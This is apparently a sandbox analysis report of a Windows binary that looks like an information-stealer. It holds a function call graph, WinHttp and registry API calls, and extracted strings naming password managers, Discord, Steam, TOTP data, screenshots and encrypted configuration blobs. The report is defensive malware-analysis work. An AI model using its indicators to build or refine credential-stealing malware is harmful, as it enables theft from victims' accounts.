414066 27 API calls 62883->62885 62886 43472a 62884->62886 62887 4346b8 62885->62887 62888 4390c6 29 API calls 62886->62888 62889 4390c6 29 API calls 62887->62889 62890 43473f WinHttpOpenRequest 62888->62890 62891 4346cd WinHttpOpenRequest 62889->62891 62894 413e27 25 API calls 62890->62894 62895 413e27 25 API calls 62891->62895 62896 4346fb 62894->62896 62895->62896 62897 414005 25 API calls 62896->62897 62898 43477b WinHttpSetTimeouts 62897->62898 62899 4348c8 WinHttpCloseHandle 62898->62899 62900 434798 _strlen 62898->62900 62899->62881 62901 4347aa WinHttpSendRequest 62900->62901 62902 4348c0 GetLastError 62901->62902 62903 4347c8 WinHttpReceiveResponse 62901->62903 62902->62899 62903->62902 62904 4347d8 WinHttpQueryDataAvailable 62903->62904 62910 4347f0 __cftof 62904->62910 62905 4347fe WinHttpReadData 62905->62910 62906 414066 27 API calls 62906->62910 62907 4348be 62907->62899 62909 414005 25 API calls 62909->62910 62910->62904 62910->62905 62910->62906 62910->62907 62910->62909 63425 41b311 27 API calls ctype 62910->63425 62912 413e41 62911->62912 62913 413e32 62911->62913 62912->61422 63454 41535e 25 API calls 2 library calls 62913->63454 62916 435c37 __EH_prolog 62915->62916 62917 414066 27 API calls 62916->62917 62918 435c59 62917->62918 63455 414087 62918->63455 62920 435c74 _strcat 62921 414005 25 API calls 62920->62921 62922 42bd51 GetUserNameA 62921->62922 62923 438f36 62922->62923 62924 438f40 __EH_prolog 62923->62924 62925 438fa5 RegOpenKeyExA 62924->62925 62926 438fe3 RegQueryValueExA 62925->62926 62928 439019 62926->62928 62929 43902c RegCloseKey 62926->62929 62928->62929 62931 414066 27 API calls 62928->62931 62930 4140e0 27 API calls 62929->62930 62932 43904a 62930->62932 62931->62929 62933 414066 27 API calls 62932->62933 62940 439068 62933->62940 62934 4390a6 62936 414005 25 API calls 62934->62936 62937 4390ae 62936->62937 62939 414005 25 API calls 62937->62939 62941 42bd96 62939->62941 62940->62934 63460 447210 45 API calls 62940->63460 63461 41402b 27 API calls 62940->63461 62941->61445 62947 415e10 __EH_prolog 62942->62947 62943 415ea3 62944 415ecc 62943->62944 63463 41402b 27 API calls 62943->63463 62944->61445 62947->62943 63462 41402b 27 API calls 62947->63462 62949 414010 62948->62949 62950 414019 62948->62950 63464 41535e 25 API calls 2 library calls 62949->63464 62950->61463 62953 424146 62952->62953 63465 42618e 62953->63465 62956 42247a 62957 422484 __EH_prolog 62956->62957 63480 42293f 62957->63480 62963 422536 63514 422690 62963->63514 62967 422560 62968 422577 62967->62968 63587 40af5f 25 API calls 62967->63587 62968->61468 62970->61370 62971->61404 62972->61405 62973->61422 62974->61422 62975->61422 62976->61411 62977->61459 62978->61471 62979->61474 62980->61476 62981->61478 62982->61483 62983->61485 62984->61487 62985->61557 62986->61519 62987->61557 62988->61557 62989->61557 62990->61557 62991->61557 62992->61557 62993->61557 62994->61541 62995->61541 62996->61541 62997->61541 62998->61541 62999->61541 63001 4390db 63000->63001 63002 4390dd MultiByteToWideChar 63000->63002 63001->63002 63886 43a314 63002->63886 63004 439110 MultiByteToWideChar 63004->61541 63006->61541 63008->61495 63009->61498 63010->61502 63011->61507 63012->61510 63013->61513 63014->61517 63015->61522 63016->61526 63017->61528 63018->61531 63019->61534 63020->61540 63021->61544 63022->61548 63023->61550 63024->61558 63025->61560 63026->61562 63027->61564 63028->61566 63029->61571 63030->61573 63031->61575 63032->61577 63033->61579 63034->61583 63035->61586 63036->61589 63037->61591 63038->61593 63039->61596 63040->61599 63041->61668 63042->61668 63043->61668 63044->61668 63045->61668 63046->61668 63047->61668 63049->61687 63050->61687 63051->61687 63052->61687 63053->61687 63054->61687 63056->61684 63057->61729 63058->61729 63059->61729 63060->61729 63061->61729 63062->61729 63064->61684 63065->61612 63066->61628 63067->61641 63068->61649 63069->61681 63070->61691 63071->61705 63072->61709 63073->61714 63074->61730 63075->61752 63076->61757 63077->61753 63078->61710 63079->61629 63080->61694 63081->61694 63082->61629 63083->61629 63084->61629 63085->61629 63086->61629 63087->61629 63088->61644 63089->61651 63090->61664 63091->61672 63092->61685 63093->61703 63094->61742 63095->61742 63096->61742 63097->61742 63098->61742 63099->61720 63100->61725 63101->61663 63102->61675 63103->61683 63104->61696 63105->61721 63106->61737 63107->61744 63108->61755 63109->61774 63110->61776 63111->61779 63112->61781 63113->61783 63114->61785 63115->61803 63116->61807 63117->61810 63118->61813 63119->61815 63120->61818 63122 4135a9 63121->63122 63123 4135bd 63121->63123 63124 41350d 27 API calls 63122->63124 63123->61790 63124->63123 63125->61793 63126->61796 63127->61799 63128->61804 63129->61817 63130->61823 63131->61825 63132->61830 63133->61834 63134->61836 63135->61855 63136->61860 63137->61865 63138->61833 63139->61853 63140->61862 63141->61879 63142->61883 63143->61887 63144->61867 63145->61880 63146->61891 63147->61930 63148->61935 63149->61942 63150->61894 63151->61896 63152->61903 63153->61907 63154->61911 63155->61913 63156->61919 63157->61906 63158->61910 63159->61921 63160->61925 63161->61929 63162->61934 63163->61941 63164->61924 63165->61931 63166->61944 63167->61949 63168->61952 63169->61956 63170->61960 63171->61948 63172->61955 63173->61964 63174->61966 63175->61998 63176->61969 63177->61978 63178->62330 63179->62049 63180->62091 63181->62091 63182->62104 63183->62113 63184->62129 63185->62160 63186->62169 63187->62117 63188->62122 63189->62125 63190->62128 63191->62131 63192->62135 63193->62137 63194->62141 63195->62145 63196->62152 63197->62156 63198->62159 63199->62180 63200->62185 63201->62189 63202->62191 63203->62193 63204->62195 63205->62199 63206->62206 63207->62212 63208->62215 63209->62241 63210->62181 63211->62186 63212->62198 63213->62220 63214->62242 63215->62242 63216->62242 63217->62260 63218->62230 63219->62244 63220->62244 63221->62244 63222->62268 63223->62283 63224->62303 63225->62274 63226->62278 63227->62282 63228->62289 63229->62313 63230->62313 63231->62320 63232->61998 63233->61998 63234->61996 63235->62004 63236->62006 63237->62008 63238->62021 63239->62026 63240->62066 63241->62010 63242->62038 63243->62041 63244->62013 63245->62062 63246->62067 63247->62087 63248->62017 63249->62210 63250->62225 63251->62231 63252->62239 63253->62253 63254->62270 63255->62288 63256->62291 63257->62300 63258->62302 63259->62315 63260->62321 63261->62332 63262->62335 63263->62341 63264->62343 63265->62349 63266->62351 63267->62357 63268->62359 63269->62363 63270->62366 63271->62370 63272->62372 63273->62376 63274->62378 63275->62383 63276->62385 63277->62391 63278->62393 63279->62397 63280->62399 63281->62403 63282->62406 63283->62413 63284->62422 63285->62429 63286->62439 63287->62446 63288->62400 63289->62404 63290->62409 63291->62415 63292->62423 63293->62425 63294->62440 63295->62483 63296->62483 63297->62483 63298->62483 63299->62498 63300->62501 63301->62519 63302->62519 63303->62519 63304->62483 63305->62483 63306->62459 63307->62463 63308->62426 63309->62432 63310->62442 63311->62450 63312->62454 63313->62460 63314->62472 63315->62481 63316->62458 63317->62465 63318->62480 63319->62487 63320->62491 63321->62494 63322->62505 63323->62539 63324->62539 63325->62539 63326->62539 63327->62537 63328->62537 63329->62539 63330->62539 63331->62513 63332->62515 63333->62493 63334->62497 63335->62502 63336->62506 63337->62523 63338->62527 63339->62540 63340->62543 63341->62549 63342->62551 63343->62555 63344->62557 63345->62575 63346->62575 63347->62571 63348->62575 63349->62575 63350->62561 63351->62563 63352->62566 63353->62570 63354->62577 63355->62579 63356->62598 63357->62598 63358->62593 63359->62598 63360->62598 63361->62583 63362->62585 63363->62588 63364->62592 63365->62601 63366->62603 63367->62609 63368->62651 63369->62651 63370->62651 63371->62653 63372->62651 63373->62651 63374->62651 63375->62613 63376->62615 63377->62617 63378->62620 63380->61479 63381->61358 63383->62802 63384->62815 63385->62822 63386->62823 63387->62828 63388->62828 63389->62830 63391 4140fb 63390->63391 63393 41410d ctype 63391->63393 63394 415338 27 API calls std::_Facet_Register 63391->63394 63393->62835 63394->63393 63396 415eea 63395->63396 63397 414005 25 API calls 63396->63397 63398 415f5a 63397->63398 63398->62842 63400 415f6b __EH_prolog 63399->63400 63407 4144c0 63400->63407 63403 4140e0 27 API calls 63404 41602c 63403->63404 63405 414005 25 API calls 63404->63405 63406 416034 63405->63406 63406->62846 63408 4144dd 63407->63408 63409 4144cd 63407->63409 63411 414582 49 API calls __cftof 63408->63411 63409->63403 63411->63409 63413 413e7c 63412->63413 63413->63413 63416 413e99 63413->63416 63415 413365 63415->61422 63417 413ece 63416->63417 63419 413ea8 63416->63419 63420 415094 27 API calls _Deallocate 63417->63420 63419->63415 63420->63419 63422 433ce6 63421->63422 63426 45186e 63422->63426 63425->62910 63429 44fc30 63426->63429 63430 44fc62 63429->63430 63431 44fc4d 63429->63431 63430->63431 63433 44fc68 swprintf 63430->63433 63449 44c424 14 API calls __dosmaperr 63431->63449 63451 446f44 42 API calls 2 library calls 63433->63451 63434 44fc52 63450 446c74 25 API calls _Deallocate 63434->63450 63436 44fc5d 63442 440fa3 63436->63442 63438 44fc84 63452 450e87 44 API calls 2 library calls 63438->63452 63440 433cf0 63440->62858 63443 440fac IsProcessorFeaturePresent 63442->63443 63444 440fab 63442->63444 63446 4416cf 63443->63446 63444->63440 63453 441692 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 63446->63453 63448 4417b2 63448->63440 63449->63434 63450->63436 63451->63438 63452->63436 63453->63448 63454->62912 63456 4140c7 63455->63456 63458 41409d ctype 63455->63458 63459 415284 27 API calls 2 library calls 63456->63459 63458->62920 63459->63458 63460->62940 63461->62940 63462->62947 63463->62943 63464->62950 63467 426198 __EH_prolog 63465->63467 63466 426221 63469 426270 63466->63469 63470 426236 63466->63470 63467->63466 63476 44fbaf 84 API calls __wsopen_s 63467->63476 63478 40a9ef 27 API calls 4 library calls 63469->63478 63477 40a9ef 27 API calls 4 library calls 63470->63477 63473 42623b 63474 42415e 63473->63474 63479 40af5f 25 API calls 63473->63479 63474->62956 63476->63466 63477->63473 63478->63473 63479->63474 63588 423238 63480->63588 63485 42298b 84 API calls 63486 4224a4 63485->63486 63487 423031 63486->63487 63611 44c2ef 63487->63611 63491 422521 63492 4232b4 63491->63492 63493 4232e5 63492->63493 63494 4232c4 63492->63494 63503 42331e 63493->63503 63510 4232ec 63493->63510 63666 423545 27 API calls 63493->63666 63662 423545 27 API calls 63494->63662 63497 4232c9 63498 4232d2 63497->63498 63499 4232fb 63497->63499 63663 423545 27 API calls 63498->63663 63665 423dbe 84 API calls 63499->63665 63502 4232d7 63502->63510 63664 423545 27 API calls 63502->63664 63504 423381 63503->63504 63508 423323 63503->63508 63507 42333a 63504->63507 63511 4233b6 63504->63511 63507->63510 63667 4235fe 85 API calls __dosmaperr 63507->63667 63508->63507 63508->63510 63512 423358 63508->63512 63510->62963 63511->63510 63669 4235a1 84 API calls 63511->63669 63668 4239e0 84 API calls 63512->63668 63515 42269a __EH_prolog 63514->63515 63516 4226b5 63515->63516 63517 4227e8 63515->63517 63799 422c6b 84 API calls __EH_prolog 63516->63799 63670 424ae3 63517->63670 63520 42298b 84 API calls 63522 422815 63520->63522 63524 4232b4 85 API calls 63522->63524 63523 4226d0 63800 42427d 85 API calls 2 library calls 63523->63800 63526 422822 63524->63526 63528 4228c6 63526->63528 63530 414066 27 API calls 63526->63530 63527 4226e2 63529 42298b 84 API calls 63527->63529 63531 4228ec 63528->63531 63535 423238 84 API calls 63528->63535 63532 4226e9 63529->63532 63534 42284b 63530->63534 63835 422b93 25 API calls _Deallocate 63531->63835 63536 4232b4 85 API calls 63532->63536 63808 422d37 48 API calls __EH_prolog 63534->63808 63539 4228de 63535->63539 63540 4226f6 63536->63540 63537 422555 63586 40af5f 25 API calls 63537->63586 63543 42298b 84 API calls 63539->63543 63541 42279d 63540->63541 63544 414066 27 API calls 63540->63544 63545 4227c1 63541->63545 63546 4227a6 63541->63546 63542 42285f 63809 41b7bb 27 API calls __EH_prolog 63542->63809 63548 4228e5 63543->63548 63549 42271f 63544->63549 63551 4227d8 63545->63551 63556 42293f 84 API calls 63545->63556 63550 423238 84 API calls 63546->63550 63834 4230cb 84 API calls 63548->63834 63801 422d37 48 API calls __EH_prolog 63549->63801 63555 4227b8 63550->63555 63807 422aad 84 API calls 63551->63807 63552 42287c 63810 422faa 48 API calls __EH_prolog 63552->63810 63560 42298b 84 API calls 63555->63560 63561 4227bf 63556->63561 63559 422733 63802 41b7bb 27 API calls __EH_prolog 63559->63802 63560->63561 63806 4230cb 84 API calls 63561->63806 63562 422890 63811 422ae1 63562->63811 63567 422750 63803 422faa 48 API calls __EH_prolog 63567->63803 63568 414005 25 API calls 63570 4228a7 63568->63570 63833 41b796 14 API calls ___std_exception_destroy 63570->63833 63571 422764 63804 422bb9 84 API calls 2 library calls 63571->63804 63574 4228b2 63576 414005 25 API calls 63574->63576 63575 422776 63577 414005 25 API calls 63575->63577 63578 4228ba 63576->63578 63579 42277e 63577->63579 63580 414005 25 API calls 63578->63580 63805 41b796 14 API calls ___std_exception_destroy 63579->63805 63580->63528 63582 422789 63583 414005 25 API calls 63582->63583 63584 422791 63583->63584 63585 414005 25 API calls 63584->63585 63585->63541 63586->62967 63587->62968 63589 423247 63588->63589 63596 422967 63588->63596 63590 423257 63589->63590 63591 42326b 63589->63591 63592 42324e 63589->63592 63589->63596 63606 415338 27 API calls std::_Facet_Register 63590->63606 63607 42535f 84 API calls __EH_prolog 63591->63607 63605 4252f2 84 API calls 2 library calls 63592->63605 63597 42298b 63596->63597 63598 42299a 63597->63598 63600 4229b0 63597->63600 63598->63600 63608 44fbaf 84 API calls __wsopen_s 63598->63608 63601 4229cf 63600->63601 63604 42296e 63600->63604 63609 44fbaf 84 API calls __wsopen_s 63600->63609 63601->63604 63610 44fbaf 84 API calls __wsopen_s 63601->63610 63604->63485 63605->63596 63606->63596 63607->63596 63608->63600 63609->63601 63610->63604 63617 45a1cf GetLastError 63611->63617 63616 44fbaf 84 API calls __wsopen_s 63616->63491 63618 45a1e6 63617->63618 63619 45a1ec 63617->63619 63651 458c27 6 API calls _unexpected 63618->63651 63623 45a1f2 SetLastError 63619->63623 63652 458c66 6 API calls _unexpected 63619->63652 63622 45a20a 63622->63623 63624 45a20e 63622->63624 63630 45a286 63623->63630 63631 44c2fa 63623->63631 63653 458668 14 API calls 3 library calls 63624->63653 63626 45a21a 63628 45a222 63626->63628 63629 45a239 63626->63629 63654 458c66 6 API calls _unexpected 63628->63654 63656 458c66 6 API calls _unexpected 63629->63656 63660 453419 42 API calls __FrameHandler3::FrameUnwindToState 63630->63660 63647 45a53a 63631->63647 63636 45a245 63637 45a249 63636->63637 63638 45a25a 63636->63638 63657 458c66 6 API calls _unexpected 63637->63657 63658 459ffd 14 API calls __Getctype 63638->63658 63642 45a236 63642->63623 63643 45a230 63655 45813e 14 API calls __dosmaperr 63643->63655 63644 45a265 63659 45813e 14 API calls __dosmaperr 63644->63659 63646 45a26c 63646->63623 63648 423097 63647->63648 63649 45a54d 63647->63649 63648->63491 63648->63616 63649->63648 63661 462697 42 API calls 4 library calls 63649->63661 63651->63619 63652->63622 63653->63626 63654->63643 63655->63642 63656->63636 63657->63643 63658->63644 63659->63646 63661->63648 63662->63497 63663->63502 63664->63493 63665->63493 63666->63493 63667->63510 63668->63510 63669->63510 63685 424aed __EH_prolog 63670->63685 63673 42504e 63675 425053 63673->63675 63676 4250c5 63673->63676 63674 42280e 63674->63520 63680 414066 27 API calls 63675->63680 63679 414066 27 API calls 63676->63679 63677 42642e 84 API calls 63677->63685 63684 4250e5 63679->63684 63689 425073 63680->63689 63861 422d37 48 API calls __EH_prolog 63684->63861 63685->63673 63685->63675 63685->63677 63688 4277f0 27 API calls 63685->63688 63694 4232b4 85 API calls 63685->63694 63696 424d8b 63685->63696 63698 425281 63685->63698 63706 425210 63685->63706 63712 424fac 63685->63712 63713 4278ba 84 API calls 63685->63713 63721 42512f 63685->63721 63737 424e84 63685->63737 63743 424f14 63685->63743 63751 4234c5 27 API calls 63685->63751 63796 424e2a 63685->63796 63836 4266cc 84 API calls 63685->63836 63837 426536 84 API calls 63685->63837 63838 42692d 84 API calls 63685->63838 63839 426862 84 API calls 63685->63839 63840 426797 84 API calls 63685->63840 63841 426601 84 API calls 63685->63841 63849 42583f 27 API calls 63685->63849 63687 425147 63865 4240f5 27 API calls 63687->63865 63688->63685 63858 422d37 48 API calls __EH_prolog 63689->63858 63694->63685 63695 4250fe 63862 41b7bb 27 API calls __EH_prolog 63695->63862 63701 414066 27 API calls 63696->63701 63697 42515c 63866 413556 27 API calls 63697->63866 63703 414066 27 API calls 63698->63703 63699 42508b 63859 41b7bb 27 API calls __EH_prolog 63699->63859 63708 424daa 63701->63708 63710 4252a0 63703->63710 63715 414066 27 API calls 63706->63715 63707 42511b 63863 422faa 48 API calls __EH_prolog 63707->63863 63842 422d37 48 API calls __EH_prolog 63708->63842 63709 42516e 63867 41bb67 27 API calls __EH_prolog 63709->63867 63874 422d37 48 API calls __EH_prolog 63710->63874 63711 4250a8 63860 422faa 48 API calls __EH_prolog 63711->63860 63720 414066 27 API calls 63712->63720 63713->63685 63722 42522f 63715->63722 63719 425014 63732 422ae1 84 API calls 63719->63732 63725 424fcb 63720->63725 63864 422faa 48 API calls __EH_prolog 63721->63864 63871 422d37 48 API calls __EH_prolog 63722->63871 63723 424dbf 63843 41b7bb 27 API calls __EH_prolog 63723->63843 63724 4252b5 63875 41b7bb 27 API calls __EH_prolog 63724->63875 63854 422d37 48 API calls __EH_prolog 63725->63854 63731 425244 63872 41b7bb 27 API calls __EH_prolog 63731->63872 63739 425023 63732->63739 63733 424ddc 63844 422faa 48 API calls __EH_prolog 63733->63844 63734 42519a 63868 422faa 48 API calls __EH_prolog 63734->63868 63735 4252d2 63876 422faa 48 API calls __EH_prolog 63735->63876 63736 424fe3 63855 41b7bb 27 API calls __EH_prolog 63736->63855 63745 414066 27 API calls 63737->63745 63747 414005 25 API calls 63739->63747 63756 414066 27 API calls 63743->63756 63753 424ea3 63745->63753 63746 425261 63873 422faa 48 API calls __EH_prolog 63746->63873 63755 425030 63747->63755 63748 424df3 63761 422ae1 84 API calls 63748->63761 63749 4251ad 63757 422ae1 84 API calls 63749->63757 63750 4252e9 63751->63685 63752 425000 63856 422faa 48 API calls __EH_prolog 63752->63856 63846 422d37 48 API calls __EH_prolog 63753->63846 63857 41b796 14 API calls ___std_exception_destroy 63755->63857 63762 424f31 63756->63762 63763 4251bc 63757->63763 63766 424e02 63761->63766 63850 422d37 48 API calls __EH_prolog 63762->63850 63768 414005 25 API calls 63763->63768 63764 424eb8 63847 41b7bb 27 API calls __EH_prolog 63764->63847 63765 424fa4 63774 414005 25 API calls 63765->63774 63770 414005 25 API calls 63766->63770 63772 4251c9 63768->63772 63775 424e0f 63770->63775 63771 424f46 63851 41b7bb 27 API calls __EH_prolog 63771->63851 63869 41b796 14 API calls ___std_exception_destroy 63772->63869 63773 424ed5 63848 422faa 48 API calls __EH_prolog 63773->63848 63779 425046 63774->63779 63845 41b796 14 API calls ___std_exception_destroy 63775->63845 63786 414005 25 API calls 63779->63786 63781 424f63 63852 422faa 48 API calls __EH_prolog 63781->63852 63782 4251d4 63785 414005 25 API calls 63782->63785 63783 424e1a 63787 414005 25 API calls 63783->63787 63789 4251dc 63785->63789 63786->63796 63791 424e22 63787->63791 63788 424f7a 63792 422ae1 84 API calls 63788->63792 63790 414005 25 API calls 63789->63790 63790->63779 63793 414005 25 API calls 63791->63793 63794 424f89 63792->63794 63793->63796 63795 414005 25 API calls 63794->63795 63797 424f99 63795->63797 63870 422b93 25 API calls _Deallocate 63796->63870 63853 41b796 14 API calls ___std_exception_destroy 63797->63853 63799->63523 63800->63527 63801->63559 63802->63567 63803->63571 63804->63575 63805->63582 63806->63551 63808->63542 63809->63552 63810->63562 63812 422af1 63811->63812 63832 42289f 63811->63832 63813 422b07 63812->63813 63814 422b68 63812->63814 63815 422b58 63813->63815 63816 422b0c 63813->63816 63884 423130 26 API calls std::bad_exception::bad_exception 63814->63884 63883 4231a8 26 API calls std::bad_exception::bad_exception 63815->63883 63819 422b11 63816->63819 63820 422b48 63816->63820 63821 422b16 63819->63821 63822 422b38 63819->63822 63882 4231c3 26 API calls std::bad_exception::bad_exception 63820->63882 63825 422b7b 63821->63825 63826 422b1b 63821->63826 63881 42318d 26 API calls std::bad_exception::bad_exception 63822->63881 63824 422b41 63877 443a5b 63824->63877 63885 4231de 26 API calls std::bad_exception::bad_exception 63825->63885 63880 44fbaf 84 API calls __wsopen_s 63826->63880 63831 422b92 63832->63568 63833->63574 63834->63531 63835->63537 63836->63685 63837->63685 63838->63685 63839->63685 63840->63685 63841->63685 63842->63723 63843->63733 63844->63748 63845->63783 63846->63764 63847->63773 63848->63748 63849->63685 63850->63771 63851->63781 63852->63788 63853->63765 63854->63736 63855->63752 63856->63719 63857->63765 63858->63699 63859->63711 63860->63719 63861->63695 63862->63707 63863->63721 63864->63687 63865->63697 63866->63709 63867->63734 63868->63749 63869->63782 63870->63674 63871->63731 63872->63746 63873->63748 63874->63724 63875->63735 63876->63750 63878 443a75 63877->63878 63879 443aa2 KiUserExceptionDispatcher 63877->63879 63878->63879 63879->63831 63880->63832 63881->63824 63882->63824 63883->63824 63884->63824 63885->63824 63887 43a349 63886->63887 63889 43a323 _wmemset 63886->63889 63890 43af77 27 API calls 2 library calls 63887->63890 63889->63004 63890->63889
                    APIs
                    • __EH_prolog.LIBCMT ref: 0042B3A4
                    • CoInitialize.OLE32(00000000), ref: 0042B3C0
                    • GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 0042B3E9
                    • GetLocaleInfoA.KERNEL32(00000000), ref: 0042B3F0
                      • Part of subcall function 00415C44: __EH_prolog.LIBCMT ref: 00415C49
                    • Sleep.KERNEL32(00000DAC,0047AC6B), ref: 0042BAD3
                    • Sleep.KERNELBASE(000003E8,0047AC6B,?), ref: 0042BB1D
                      • Part of subcall function 00416047: __EH_prolog.LIBCMT ref: 0041604C
                    • GetUserNameA.ADVAPI32(?,00000101), ref: 0042BD6B
                      • Part of subcall function 004344FE: __EH_prolog.LIBCMT ref: 00434503
                      • Part of subcall function 004344FE: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,0048A818,00000000,00000000), ref: 00434543
                      • Part of subcall function 004344FE: WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?), ref: 0043460F
                      • Part of subcall function 00413E27: _Deallocate.LIBCONCRT ref: 00413E3C
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                    • Sleep.KERNEL32(00007530), ref: 0042BF38
                    • _strlen.LIBCMT ref: 0042C057
                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 0042C3FE
                    • CreateThread.KERNEL32 ref: 0042C505
                    • CreateThread.KERNEL32 ref: 0042C517
                    • CreateThread.KERNEL32 ref: 0042C529
                    • CreateThread.KERNEL32 ref: 0042C53B
                      • Part of subcall function 00433097: __EH_prolog.LIBCMT ref: 004338AC
                      • Part of subcall function 004390C6: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 004390EB
                      • Part of subcall function 004390C6: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00439132
                    • _strlen.LIBCMT ref: 0042C071
                      • Part of subcall function 00432CA5: __EH_prolog.LIBCMT ref: 00432CAA
                      • Part of subcall function 00428625: __EH_prolog.LIBCMT ref: 0042862A
                    • CreateThread.KERNEL32 ref: 0042C759
                    • CreateThread.KERNEL32 ref: 0042C7A9
                    • StrToIntA.SHLWAPI(00000000,?,?,00000000,00000002,00000000,00000001,00000000,00000000,00000002,00000001,00000000), ref: 0042CBB7
                    • CreateThread.KERNEL32 ref: 0042CE85
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0042CE8E
                      • Part of subcall function 004241F1: __EH_prolog.LIBCMT ref: 004241F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog$CreateThread$Sleep$ByteCharDeallocateHttpMultiUserWide_strlen$ConnectDefaultInfoInitializeLocaleNameObjectOpenSingleWait
                    • String ID: $#$%$'$)$/$1$1password$2$2$5$5611095ee49218feb5b751c501370b8c $7$8$9$9$;$;$@$@$A$F$GET$GrOrOjybVzRniOZtzxMtw3Ko4S/6shE1GMFix5MuI/OpoIX/jAoBNQ== $I$I$O$O$O$O$POST$Rf66cjXWSDBo1vlrnxFnlmWs5Hi27k1oEtcnlNpxYeb17MW50EYfagyr/AdW3PZLmHbaKV1pyjb0uAxyj3xJTof/Rx+L483exBcQEdRpb+/UVI0E1J+0wdRK86olsGqbBQRJ18LPkcSKB2QSBqg8QC7KxArlS9BfWFJe44VgOLqHeg25q0M6gvnBqBo+AF4eLDzOOfVMBgbKrtV6L36X6vCmf8PgdjNdEGHdtsfLEFKGO8rrcTkq2ctD $V$Y$Z$\data.json$]$]$_$_id$a$aE5-mO-4m_A$b$b$bitwarden$d$discord_files\$e$e$ews$fB9oV$ffs$latitude$location$longitude$mC6fU$n$n$o$o$p$p$r$screen.jpeg$sqlite3.dll$steamstr$stm$tgs$totps$w$x$zip${$}
                    • API String ID: 735833627-1758150525
                    • Opcode ID: 758715eb1d6f196b5e4d0183cf03d628dee932037e3a4fe88597d8a17831f9ba
                    • Instruction ID: 85527a646f7813a7f43d218ba1f8161405dc7401b006f0ffd2eb40277b08c653
                    • Opcode Fuzzy Hash: 758715eb1d6f196b5e4d0183cf03d628dee932037e3a4fe88597d8a17831f9ba
                    • Instruction Fuzzy Hash: CDE3A134D052A89ADF25EB65CD92BEEB7745F25304F0000DEA459B72C2DEBC1B88CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4076 424ae3-424b14 call 468510 4079 424b17 4076->4079 4080 424b1a-424b1c 4079->4080 4081 424b22-424b28 4080->4081 4082 424d3d 4080->4082 4084 424bd3-424bd6 4081->4084 4085 424b2e 4081->4085 4083 424d41-424d45 4082->4083 4086 4251f2 4083->4086 4087 424d4b-424d6b call 425896 4083->4087 4088 424cf5-424d17 call 447e46 4084->4088 4089 424bdc-424bdf 4084->4089 4090 424b30-424b33 4085->4090 4091 424bae-424bce call 426797 4085->4091 4096 4251f5-42520d call 422b93 4086->4096 4113 424d71-424d7c call 4232b4 4087->4113 4114 424e2f-424e3a call 4232b4 4087->4114 4119 425138-4251e7 call 422faa call 4240f5 call 413556 call 414152 call 41bb67 call 422faa call 422ae1 call 414005 call 41b796 call 414005 * 2 4088->4119 4120 424d1d-424d3b call 426601 4088->4120 4097 424be5-424be8 4089->4097 4098 424c9c-424cb6 call 42642e 4089->4098 4092 424b35-424b38 4090->4092 4093 424ba9-424bac 4090->4093 4091->4083 4100 424b95 4092->4100 4101 424b3a-424b3d 4092->4101 4102 424b99-424ba4 call 426862 4093->4102 4106 42504e-425051 4097->4106 4107 424bee-424c07 call 42642e 4097->4107 4123 424cc0-424cc8 call 4277f0 4098->4123 4124 424cb8-424cbe 4098->4124 4100->4102 4111 424b88-424b90 call 42692d 4101->4111 4112 424b3f-424b42 4101->4112 4102->4083 4116 425053-4250c0 call 414066 call 422d37 call 41b7bb call 422faa 4106->4116 4117 4250c5-42512f call 414066 call 422d37 call 41b7bb call 422faa 4106->4117 4144 424c11-424c19 call 4277f0 4107->4144 4145 424c09-424c0f 4107->4145 4111->4083 4126 424b44-424b47 4112->4126 4127 424b78-424b83 call 426536 4112->4127 4152 424d82-424d85 4113->4152 4153 424c87-424c8e call 4232b4 4113->4153 4148 424e40-424e4d call 4232b4 4114->4148 4149 424ef5-424ef8 4114->4149 4212 425018-42501e call 422ae1 4116->4212 4117->4119 4282 4251ed call 414005 4119->4282 4120->4083 4141 424ccd-424cdb call 4232b4 4123->4141 4124->4141 4126->4116 4136 424b4d-424b73 call 4266cc 4126->4136 4127->4083 4136->4083 4179 424c30-424c34 4141->4179 4180 424ce1-424cf3 call 4234c5 4141->4180 4158 424c1e-424c2e call 4232b4 4144->4158 4145->4158 4183 424e53-424e7e call 4278ba call 4232b4 4148->4183 4184 425210-42527c call 414066 call 422d37 call 41b7bb call 422faa 4148->4184 4164 424efe-424f0f call 42583f 4149->4164 4167 425281-4252e9 call 414066 call 422d37 call 41b7bb call 422faa 4149->4167 4163 424d8b-424df3 call 414066 call 422d37 call 41b7bb call 422faa 4152->4163 4152->4164 4187 424c91-424c97 4153->4187 4158->4179 4182 424c39-424c3c 4158->4182 4250 424df7-424e2a call 422ae1 call 414005 call 41b796 call 414005 * 2 4163->4250 4164->4079 4179->4083 4180->4187 4193 424c42-424c72 call 4278ba call 4232b4 4182->4193 4194 424fac-425014 call 414066 call 422d37 call 41b7bb call 422faa 4182->4194 4183->4153 4230 424e84-424ef0 call 414066 call 422d37 call 41b7bb call 422faa 4183->4230 4184->4250 4187->4080 4236 424f14-424fa7 call 414066 call 422d37 call 41b7bb call 422faa call 422ae1 call 414005 call 41b796 4193->4236 4237 424c78-424c82 call 4234c5 4193->4237 4194->4212 4232 425023-42503b call 414005 call 41b796 4212->4232 4230->4250 4267 425041-425049 call 414005 4232->4267 4236->4267 4237->4153 4250->4096 4267->4282 4282->4086
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
